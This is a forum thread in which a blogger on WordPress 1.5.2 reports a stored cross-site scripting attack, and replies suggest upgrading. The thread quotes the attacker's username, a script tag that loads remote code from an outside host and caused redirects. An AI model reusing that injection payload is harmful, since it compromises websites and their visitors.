• Hopefully someone has a solution. I’m using WP 1.5.2. I know, there are later versions, but I fell in love with 1.5.2 and it has done me well in search engines all these years. Only recently did a problem started to happen.

I woke up this morning to an new user. I get notified when a new user comes on board and the following was in the email:

New user registration on your blog Online Dating Blog and Articles:

    Username: <script src=https://nmaq.com/q.php>jonny494</script>

I knew by the email that there was going to be a problem. Sure enough, when I went to my blog and clicked certain links it was redirected to a site I never heard of. This is the 3rd time this has happen (the redirection has been different sites each time).

I fix the problem by going into my sql database and deleting the code the user injected. I’m hoping there is a permanent solution to prevent this from happening in the future.

Does anyone have any idea of how I can prevent this in the future?

    Thanks
    Steve

  • Upgrade? I don’t know if that’s sufficient, but I’d think it would be necessary.

I was hoping there was another solution. I spent much time customizing the templates. I’m sure I’m not the only one who uses older versions of wordpress and wants to stay with it. I was hoping that there may be a solution that would keep me with the version I’m using.

Most of the templates carry over well to the 2.x versions.
Why not set up a test blog in a subdirectory and give it a whirl?
